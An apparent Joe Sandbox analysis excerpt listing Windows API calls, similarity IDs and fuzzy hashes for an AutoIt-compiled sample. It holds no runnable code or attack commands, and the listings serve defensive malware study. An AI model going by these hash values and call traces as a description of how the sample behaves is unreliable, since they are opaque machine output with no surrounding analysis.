                                            • API ID: EnumFreeLibrary$CloseDeleteOpen
                                            • String ID:
                                            • API String ID: 395352322-0
                                            • Opcode ID: 9efab34eca51210b48a0bb2fd273f12060ad9bd9cca1f13b3a1dfd862baa05b4
                                            • Instruction ID: fe730b78ebd57c68178251510c55124c4855992c210175cb11aaad013870f589
                                            • Opcode Fuzzy Hash: 9efab34eca51210b48a0bb2fd273f12060ad9bd9cca1f13b3a1dfd862baa05b4
                                            • Instruction Fuzzy Hash: 7C31F7B1911209BFDB159B94DC89AFFB7BCFF08300F10016AA612E2190D6719F899BB0
                                            APIs
                                            • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00868FE7
                                            • GetWindowLongW.USER32(00F3D948,000000F0), ref: 0086901A
                                            • GetWindowLongW.USER32(00F3D948,000000F0), ref: 0086904F
                                            • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00869081
                                            • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 008690AB
                                            • GetWindowLongW.USER32(00000000,000000F0), ref: 008690BC
                                            • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 008690D6
                                            Similarity
                                            • API ID: LongWindow$MessageSend
                                            • String ID:
                                            • API String ID: 2178440468-0
                                            • Opcode ID: e6afb4ea7ab361b991422520c92cb522ac6356b6a10fd9689283cfff5af86d26
                                            • Instruction ID: 5862835b871ac111c26397828047067be3aeec766760c6753596e7087b426355
                                            • Opcode Fuzzy Hash: e6afb4ea7ab361b991422520c92cb522ac6356b6a10fd9689283cfff5af86d26
                                            • Instruction Fuzzy Hash: 13312274640219AFDB20CF58DC89F6437A9FB5A718F160264F559CB2F2CB71A840CB82
                                            APIs
                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 008408F2
                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00840918
                                            • SysAllocString.OLEAUT32(00000000), ref: 0084091B
                                            • SysAllocString.OLEAUT32(?), ref: 00840939
                                            • SysFreeString.OLEAUT32(?), ref: 00840942
                                            • StringFromGUID2.OLE32(?,?,00000028), ref: 00840967
                                            • SysAllocString.OLEAUT32(?), ref: 00840975
                                            Similarity
                                            • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                            • String ID:
                                            • API String ID: 3761583154-0
                                            • Opcode ID: 36bb5af1b97ef5c2cba9694058ce7c622d0c20bf855f55bc99f84c718ebf79c9
                                            • Instruction ID: 29bedcc05e5b020d08204a6d27272f8dc2a8376ef72aeebd61fa72bcf20db26f
                                            • Opcode Fuzzy Hash: 36bb5af1b97ef5c2cba9694058ce7c622d0c20bf855f55bc99f84c718ebf79c9
                                            • Instruction Fuzzy Hash: 1021977660121DAFDB109F7CDC88DAB7BACFF09360B048525FA15DB192D670EC458B64
                                            Similarity
                                            • API ID: __wcsnicmp
                                            • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                            • API String ID: 1038674560-2734436370
                                            • Opcode ID: edcf4ef2d17b00aeb95336a979e1e288c1af35e3fda2d42ec5bced3271208e4d
                                            • Instruction ID: e9db857afe64a6a8b8200ad9e4901179d8837195ac247c01bb013acc416207b0
                                            • Opcode Fuzzy Hash: edcf4ef2d17b00aeb95336a979e1e288c1af35e3fda2d42ec5bced3271208e4d
                                            • Instruction Fuzzy Hash: 7C214C7124861977C730FA389C12FB77398FF65314FA54029F446E7182E6559D81C3AA
                                            APIs
                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 008409CB
                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 008409F1
                                            • SysAllocString.OLEAUT32(00000000), ref: 008409F4
                                            • SysAllocString.OLEAUT32 ref: 00840A15
                                            • SysFreeString.OLEAUT32 ref: 00840A1E
                                            • StringFromGUID2.OLE32(?,?,00000028), ref: 00840A38
                                            • SysAllocString.OLEAUT32(?), ref: 00840A46
                                            Similarity
                                            • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                            • String ID:
                                            • API String ID: 3761583154-0
                                            • Opcode ID: c7651a37515a967560f7e371d7719f57cba20f4541a5af01ee607f2748743447
                                            • Instruction ID: 191d1cf75e285f5c36ea1ff4da276c5e6303dd6f264ed5d9f244643666990d9f
                                            • Opcode Fuzzy Hash: c7651a37515a967560f7e371d7719f57cba20f4541a5af01ee607f2748743447
                                            • Instruction Fuzzy Hash: 26213175604218AFDB10EBBCDD89DAB77ACFF483607448125FA09CB2A5E674EC418B64
                                            APIs
                                              • Part of subcall function 0081D17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0081D1BA
                                              • Part of subcall function 0081D17C: GetStockObject.GDI32(00000011), ref: 0081D1CE
                                              • Part of subcall function 0081D17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 0081D1D8
                                            • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 0086A32D
                                            • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 0086A33A
                                            • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 0086A345
                                            • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 0086A354
                                            • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 0086A360
                                            Strings
                                            Similarity
                                            • API ID: MessageSend$CreateObjectStockWindow
                                            • String ID: Msctls_Progress32
                                            • API String ID: 1025951953-3636473452
                                            • Opcode ID: ca1b51ba569a94b0c3e1b48a1d97e9183406ff44522eee7b076681673475d511
                                            • Instruction ID: 4f6ec63757cf59a9ea30738f420e4c73683e18ab76f58510f4b56109b4f471c5
                                            • Opcode Fuzzy Hash: ca1b51ba569a94b0c3e1b48a1d97e9183406ff44522eee7b076681673475d511
                                            • Instruction Fuzzy Hash: 511190B115021DBEEF159FA4CC86EEB7F6DFF09798F014114BA08A61A0C6729C21DBA4
                                            APIs
                                            • GetClientRect.USER32(?,?), ref: 0081CCF6
                                            • GetWindowRect.USER32(?,?), ref: 0081CD37
                                            • ScreenToClient.USER32(?,?), ref: 0081CD5F
                                            • GetClientRect.USER32(?,?), ref: 0081CE8C
                                            • GetWindowRect.USER32(?,?), ref: 0081CEA5
                                            Similarity
                                            • API ID: Rect$Client$Window$Screen
                                            • String ID:
                                            • API String ID: 1296646539-0
                                            • Opcode ID: ac623480021ac9d4fb3d02a1c6ec3accce21760d920c0e519c4576f7ffb8dc8a
                                            • Instruction ID: 708010ed9fd4c472fce8eb1e37835c2a2f2df13925e2b04591bf23f2c65f39b2
                                            • Opcode Fuzzy Hash: ac623480021ac9d4fb3d02a1c6ec3accce21760d920c0e519c4576f7ffb8dc8a
                                            • Instruction Fuzzy Hash: AFB16B7990064ADBDF10CFA8C4807EEBBB5FF08314F149569EC59EB254EB30A990CB64
                                            APIs
                                            • CreateToolhelp32Snapshot.KERNEL32 ref: 00861C18
                                            • Process32FirstW.KERNEL32(00000000,?), ref: 00861C26
                                            • __wsplitpath.LIBCMT ref: 00861C54
                                              • Part of subcall function 00821DFC: __wsplitpath_helper.LIBCMT ref: 00821E3C
                                            • _wcscat.LIBCMT ref: 00861C69
                                            • Process32NextW.KERNEL32(00000000,?), ref: 00861CDF
                                            • CloseHandle.KERNEL32(00000000,?,?,00000002,00000000), ref: 00861CF1
                                            Similarity
                                            • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath__wsplitpath_helper_wcscat
                                            • String ID:
                                            • API String ID: 1380811348-0
                                            • Opcode ID: 5c52f61c0233ae4c9065d87f78a673bf34c3c7ac4ddf50451740214f3ba3260c
                                            • Instruction ID: 3e4097780a13b46f5053b24a73c6386e7e7a923a3d79f61b071e6c61a24f817e
                                            • Opcode Fuzzy Hash: 5c52f61c0233ae4c9065d87f78a673bf34c3c7ac4ddf50451740214f3ba3260c
                                            • Instruction Fuzzy Hash: 93514BB15043009BD720EF68D896EABB7ECFF88754F04491EF585D7292EB709944CB92
                                            APIs
                                              • Part of subcall function 00863C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00862BB5,?,?), ref: 00863C1D
                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 008630AF
                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 008630EF
                                            • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00863112
                                            • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0086313B
                                            • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0086317E
                                            • RegCloseKey.ADVAPI32(00000000), ref: 0086318B
                                            Similarity
                                            • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue
                                            • String ID:
                                            • API String ID: 3451389628-0
                                            • Opcode ID: 730d624bc179950c33cc9d677da411c26018e172f21f120fa3e723718f964c8b
                                            • Instruction ID: f54059c63dce1c5964080b32bbbca88fec2ae8ce627c3a6aa3f20732a07612c3
                                            • Opcode Fuzzy Hash: 730d624bc179950c33cc9d677da411c26018e172f21f120fa3e723718f964c8b
                                            • Instruction Fuzzy Hash: C3514571108304AFC704EF68CC96E6ABBE9FF89314F04491DF5959B2A1DB71EA09CB52
                                            APIs
                                            • GetMenu.USER32(?), ref: 00868540
                                            • GetMenuItemCount.USER32(00000000), ref: 00868577
                                            • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 0086859F
                                            • GetMenuItemID.USER32(?,?), ref: 0086860E
                                            • GetSubMenu.USER32(?,?), ref: 0086861C
                                            • PostMessageW.USER32(?,00000111,?,00000000), ref: 0086866D
                                            Similarity
                                            • API ID: Menu$Item$CountMessagePostString
                                            • String ID:
                                            • API String ID: 650687236-0
                                            • Opcode ID: 9c95e0673667967e6f684d428d7e397cb726eb59a2d82b420e7c345d1d8201c1
                                            • Instruction ID: 2e8175c6a27b90238a08e63214307ce0ef978bad3c99cf09a3c635511b10cd93
                                            • Opcode Fuzzy Hash: 9c95e0673667967e6f684d428d7e397cb726eb59a2d82b420e7c345d1d8201c1
                                            • Instruction Fuzzy Hash: B1518D71A00219EFCB11EF68C849AAEB7F5FF58310F114559E90AFB391DB70AE418B91
                                            APIs
                                            • _memset.LIBCMT ref: 00844B10
                                            • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00844B5B
                                            • IsMenu.USER32(00000000), ref: 00844B7B
                                            • CreatePopupMenu.USER32 ref: 00844BAF
                                            • GetMenuItemCount.USER32(000000FF), ref: 00844C0D
                                            • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00844C3E
                                            Similarity
                                            • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                            • String ID:
                                            • API String ID: 3311875123-0
                                            • Opcode ID: dffd6f649400c0e5f46e3a7b400cf3b1276ed5f87870a4382137c9c8e3a4ba2a
                                            • Instruction ID: 432b3e61e44c12a1641b29395733ec48b40e84225cf3a5a38c29640408584f59
                                            • Opcode Fuzzy Hash: dffd6f649400c0e5f46e3a7b400cf3b1276ed5f87870a4382137c9c8e3a4ba2a
                                            • Instruction Fuzzy Hash: DC51CD7060131DEBDF20CFA8D888BADBBF4FF54328F18515AE455DA291E3709944CB51
                                            APIs
                                            • select.WSOCK32(00000000,00000001,00000000,00000000,?,000003E8,0089DC00), ref: 00858E7C
                                            • WSAGetLastError.WSOCK32(00000000), ref: 00858E89
                                            • __WSAFDIsSet.WSOCK32(00000000,00000001,00000000), ref: 00858EAD
                                            • #16.WSOCK32(?,?,00000000,00000000), ref: 00858EC5
                                            • _strlen.LIBCMT ref: 00858EF7
                                            • WSAGetLastError.WSOCK32(00000000), ref: 00858F6A
                                            Similarity
                                            • API ID: ErrorLast$_strlenselect
                                            • String ID:
                                            • API String ID: 2217125717-0
                                            • Opcode ID: d05e203fd2376088841e2e0e79ded6a36123c7698d92c91464a6afa186be9f17
                                            • Instruction ID: d2a2be2f49d6a13768b717153ac95c8fe3dc22a4caa59d7544b8bb9fcb3357ec
                                            • Opcode Fuzzy Hash: d05e203fd2376088841e2e0e79ded6a36123c7698d92c91464a6afa186be9f17
                                            • Instruction Fuzzy Hash: 9141B271500208ABCB04EBA8CD96EAEB7B9FF48315F10425AF916E72D1DF30AE44CB51
                                            APIs
                                              • Part of subcall function 0081B34E: GetWindowLongW.USER32(?,000000EB), ref: 0081B35F
                                            • BeginPaint.USER32(?,?,?), ref: 0081AC2A
                                            • GetWindowRect.USER32(?,?), ref: 0081AC8E
                                            • ScreenToClient.USER32(?,?), ref: 0081ACAB
                                            • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 0081ACBC
                                            • EndPaint.USER32(?,?,?,?,?), ref: 0081AD06
                                            • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 0087E673
                                            Similarity
                                            • API ID: PaintWindow$BeginClientLongRectRectangleScreenViewport
                                            • String ID:
                                            • API String ID: 2592858361-0
                                            • Opcode ID: 82e9fb4781c9c7dd6cc26a2db8a11b17e51cfd9d699ef5f2b55923f17a04ff81
                                            • Instruction ID: 26a04fe7d9ceecc053aa4f3014b12f3fe1bf3715f71184b7cae0780f76178308
                                            • Opcode Fuzzy Hash: 82e9fb4781c9c7dd6cc26a2db8a11b17e51cfd9d699ef5f2b55923f17a04ff81
                                            • Instruction Fuzzy Hash: 0741A3701053059FCB10DF28DC88FB67BB8FF6A724F040659F994C62A2D7319885DBA2
                                            APIs
                                            • ShowWindow.USER32(008C1628,00000000,008C1628,00000000,00000000,008C1628,?,0087DC5D,00000000,?,00000000,00000000,00000000,?,0087DAD1,00000004), ref: 0086E40B
                                            • EnableWindow.USER32(00000000,00000000), ref: 0086E42F
                                            • ShowWindow.USER32(008C1628,00000000), ref: 0086E48F
                                            • ShowWindow.USER32(00000000,00000004), ref: 0086E4A1
                                            • EnableWindow.USER32(00000000,00000001), ref: 0086E4C5
                                            • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 0086E4E8
                                            Similarity
                                            • API ID: Window$Show$Enable$MessageSend
                                            • String ID:
                                            • API String ID: 642888154-0
                                            • Opcode ID: 1d43d925838830e24b09f9932251b36b6fec5de2726149bed62198b32cd8de5f
                                            • Instruction ID: 01e848209cf04bfe490b378bb0001e4b161d845bf862df7a40f8ebb2e68dbbb2
                                            • Opcode Fuzzy Hash: 1d43d925838830e24b09f9932251b36b6fec5de2726149bed62198b32cd8de5f
                                            • Instruction Fuzzy Hash: 5D416238601945EFDB26CF38C499B947BE1FF09704F1941A9EA58CF2A2CB31E841CB95
                                            APIs
                                            • InterlockedExchange.KERNEL32(?,000001F5), ref: 008498D1
                                              • Part of subcall function 0081F4EA: std::exception::exception.LIBCMT ref: 0081F51E
                                              • Part of subcall function 0081F4EA: __CxxThrowException@8.LIBCMT ref: 0081F533
                                            • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00849908
                                            • EnterCriticalSection.KERNEL32(?), ref: 00849924
                                            • LeaveCriticalSection.KERNEL32(?), ref: 0084999E
                                            • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 008499B3
                                            • InterlockedExchange.KERNEL32(?,000001F6), ref: 008499D2
                                            Similarity
                                            • API ID: CriticalExchangeFileInterlockedReadSection$EnterException@8LeaveThrowstd::exception::exception
                                            • String ID:
                                            • API String ID: 2537439066-0
                                            • Opcode ID: 99cc0516e407a6e298c1536132b7fdcbcc676a3ef42d1489a2c8df47b99de259
                                            • Instruction ID: fa58393a57985b93454261670f75e8d2b40eff6257705dbe22ee2f1f40475fe4
                                            • Opcode Fuzzy Hash: 99cc0516e407a6e298c1536132b7fdcbcc676a3ef42d1489a2c8df47b99de259
                                            • Instruction Fuzzy Hash: 63317031900205ABDB10EF98DC85EABBB78FF44310B1480A9E904EB296D734DA50DBA5
                                            APIs
                                            • GetForegroundWindow.USER32(?,?,?,?,?,?,008577F4,?,?,00000000,00000001), ref: 00859B53
                                              • Part of subcall function 00856544: GetWindowRect.USER32(?,?), ref: 00856557
                                            • GetDesktopWindow.USER32 ref: 00859B7D
                                            • GetWindowRect.USER32(00000000), ref: 00859B84
                                            • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 00859BB6
                                              • Part of subcall function 00847A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00847AD0
                                            • GetCursorPos.USER32(?), ref: 00859BE2
                                            • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00859C44
                                            Similarity
                                            • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                            • String ID:
                                            • API String ID: 4137160315-0
                                            • Opcode ID: 510761ea187de52ca8c143bcf4675e17e128cc58b47edc98b8da3c686c15e536
                                            • Instruction ID: aa7390206408ba78d029746efa99505338afbb680a4d57b57787e9a9723345db
                                            • Opcode Fuzzy Hash: 510761ea187de52ca8c143bcf4675e17e128cc58b47edc98b8da3c686c15e536
                                            • Instruction Fuzzy Hash: D031C172104319ABD710DF18D849F9BB7EDFF88314F00091AF995D7181D631E908CB92
                                            APIs
                                            • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 0083AFAE
                                            • OpenProcessToken.ADVAPI32(00000000), ref: 0083AFB5
                                            • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 0083AFC4
                                            • CloseHandle.KERNEL32(00000004), ref: 0083AFCF
                                            • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0083AFFE
                                            • DestroyEnvironmentBlock.USERENV(00000000), ref: 0083B012
                                            Similarity
                                            • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                            • String ID:
                                            • API String ID: 1413079979-0
                                            • Opcode ID: cfa6e318ea05538757cfd14713a18eb86881cefbff5b15ae85ebf7d35d143acf
                                            • Instruction ID: 22c74cb8e5adf527868b8f66b96724ef83c97fbd0a002b839932d427ca94503a
                                            • Opcode Fuzzy Hash: cfa6e318ea05538757cfd14713a18eb86881cefbff5b15ae85ebf7d35d143acf
                                            • Instruction Fuzzy Hash: B6214CB214020DABDB069F98DD09FAE7BA9FF84308F144015FA41A21A1D7769D21EBA1
                                            APIs
                                              • Part of subcall function 0081AF83: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 0081AFE3
                                              • Part of subcall function 0081AF83: SelectObject.GDI32(?,00000000), ref: 0081AFF2
                                              • Part of subcall function 0081AF83: BeginPath.GDI32(?), ref: 0081B009
                                              • Part of subcall function 0081AF83: SelectObject.GDI32(?,00000000), ref: 0081B033
                                            • MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 0086EC20
                                            • LineTo.GDI32(00000000,00000003,?), ref: 0086EC34
                                            • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0086EC42
                                            • LineTo.GDI32(00000000,00000000,?), ref: 0086EC52
                                            • EndPath.GDI32(00000000), ref: 0086EC62
                                            • StrokePath.GDI32(00000000), ref: 0086EC72
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                            • String ID:
                                            • API String ID: 43455801-0
                                            • Opcode ID: 2e88248fd39041fa7601923e6ec01fd8931ddcfeee74747c0aef8a39049d081a
                                            • Instruction ID: 608f79314233d911c348a21c8b4e837b5feb98f410613155caca32dd9747406b
                                            • Opcode Fuzzy Hash: 2e88248fd39041fa7601923e6ec01fd8931ddcfeee74747c0aef8a39049d081a
                                            • Instruction Fuzzy Hash: D7110576000249BFEF029F94DC88EEA7F6DFF08360F048122BA089A1A1D7719D55DBA0
                                            APIs
                                            • GetDC.USER32(00000000), ref: 0083E1C0
                                            • GetDeviceCaps.GDI32(00000000,00000058), ref: 0083E1D1
                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0083E1D8
                                            • ReleaseDC.USER32(00000000,00000000), ref: 0083E1E0
                                            • MulDiv.KERNEL32(000009EC,?,00000000), ref: 0083E1F7
                                            • MulDiv.KERNEL32(000009EC,?,?), ref: 0083E209
                                              • Part of subcall function 00839AA3: RaiseException.KERNEL32(-C0000018,00000001,00000000,00000000,00839A05,00000000,00000000,?,00839DDB), ref: 0083A53A
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: CapsDevice$ExceptionRaiseRelease
                                            • String ID:
                                            • API String ID: 603618608-0
                                            • Opcode ID: 31c30015aa0f8dc286e7a51a7d06d227912079fe60632e0061cd035bb514714a
                                            • Instruction ID: c2ad4a5ad1e5bb1309305ce916e98bebbcf54b0ae10fb51fabdf518b85f7c991
                                            • Opcode Fuzzy Hash: 31c30015aa0f8dc286e7a51a7d06d227912079fe60632e0061cd035bb514714a
                                            • Instruction Fuzzy Hash: D10171B5A00719BBEB109BA98C45A5EBFA8FB48351F004066EA04E72D0D6709C008BA1
                                            APIs
                                            • __init_pointers.LIBCMT ref: 00827B47
                                              • Part of subcall function 0082123A: __initp_misc_winsig.LIBCMT ref: 0082125E
                                              • Part of subcall function 0082123A: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00827F51
                                              • Part of subcall function 0082123A: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00827F65
                                              • Part of subcall function 0082123A: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00827F78
                                              • Part of subcall function 0082123A: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00827F8B
                                              • Part of subcall function 0082123A: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00827F9E
                                              • Part of subcall function 0082123A: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00827FB1
                                              • Part of subcall function 0082123A: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00827FC4
                                              • Part of subcall function 0082123A: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00827FD7
                                              • Part of subcall function 0082123A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00827FEA
                                              • Part of subcall function 0082123A: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00827FFD
                                              • Part of subcall function 0082123A: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00828010
                                              • Part of subcall function 0082123A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00828023
                                              • Part of subcall function 0082123A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00828036
                                              • Part of subcall function 0082123A: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00828049
                                              • Part of subcall function 0082123A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 0082805C
                                              • Part of subcall function 0082123A: GetProcAddress.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 0082806F
                                            • __mtinitlocks.LIBCMT ref: 00827B4C
                                              • Part of subcall function 00827E23: InitializeCriticalSectionAndSpinCount.KERNEL32(008BAC68,00000FA0,?,?,00827B51,00825E77,008B6C70,00000014), ref: 00827E41
                                            • __mtterm.LIBCMT ref: 00827B55
                                              • Part of subcall function 00827BBD: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00827B5A,00825E77,008B6C70,00000014), ref: 00827D3F
                                              • Part of subcall function 00827BBD: _free.LIBCMT ref: 00827D46
                                              • Part of subcall function 00827BBD: DeleteCriticalSection.KERNEL32(008BAC68,?,?,00827B5A,00825E77,008B6C70,00000014), ref: 00827D68
                                            • __calloc_crt.LIBCMT ref: 00827B7A
                                            • GetCurrentThreadId.KERNEL32 ref: 00827BA3
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: AddressProc$CriticalSection$Delete$CountCurrentHandleInitializeModuleSpinThread__calloc_crt__init_pointers__initp_misc_winsig__mtinitlocks__mtterm_free
                                            • String ID:
                                            • API String ID: 2942034483-0
                                            • Opcode ID: 3e7572bd4a5929d7c338be38efa80ba7802a7a45c6de4019cfe6137f04ff9dcb
                                            • Instruction ID: fc2a615fd43dc464bf0ee4964cc0e779d3540e50095c9edaa8bc684c93484b0f
                                            • Opcode Fuzzy Hash: 3e7572bd4a5929d7c338be38efa80ba7802a7a45c6de4019cfe6137f04ff9dcb
                                            • Instruction Fuzzy Hash: 82F0907210D7321AEA28777F7C46A4A2784FF01730F2106A9FD60C51D2FF2188C14172
                                            APIs
                                            • MapVirtualKeyW.USER32(0000005B,00000000), ref: 0080281D
                                            • MapVirtualKeyW.USER32(00000010,00000000), ref: 00802825
                                            • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00802830
                                            • MapVirtualKeyW.USER32(000000A1,00000000), ref: 0080283B
                                            • MapVirtualKeyW.USER32(00000011,00000000), ref: 00802843
                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 0080284B
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: Virtual
                                            • String ID:
                                            • API String ID: 4278518827-0
                                            • Opcode ID: dd91b4dc79cdae2958992f53f97f224710636caed0c5aae629a46c840d6fa263
                                            • Instruction ID: 284564454b3b6ce7bacfe3ab1fa31dde96dfecb4c748d5a00423a6b20f0afb3f
                                            • Opcode Fuzzy Hash: dd91b4dc79cdae2958992f53f97f224710636caed0c5aae629a46c840d6fa263
                                            • Instruction Fuzzy Hash: 36016CB0901B5D7DE3008F6A8C85B52FFA8FF15354F00411B915C47941C7F5A864CBE5
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: CriticalExchangeInterlockedSection$EnterLeaveObjectSingleTerminateThreadWait
                                            • String ID:
                                            • API String ID: 1423608774-0
                                            • Opcode ID: fb6678790c853a57dee7f07dd350aea2e95179803f65ed2f23637dc1d0df814c
                                            • Instruction ID: 2647de15a835ffc5f5e16537b5fe0bcc2b5d53860674f54cb2f4475075aaaa92
                                            • Opcode Fuzzy Hash: fb6678790c853a57dee7f07dd350aea2e95179803f65ed2f23637dc1d0df814c
                                            • Instruction Fuzzy Hash: CB018132142321ABDB256B5CEC48DEB777AFF88712B040529F543D21E0DB64A800DB50
                                            APIs
                                            • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00847C07
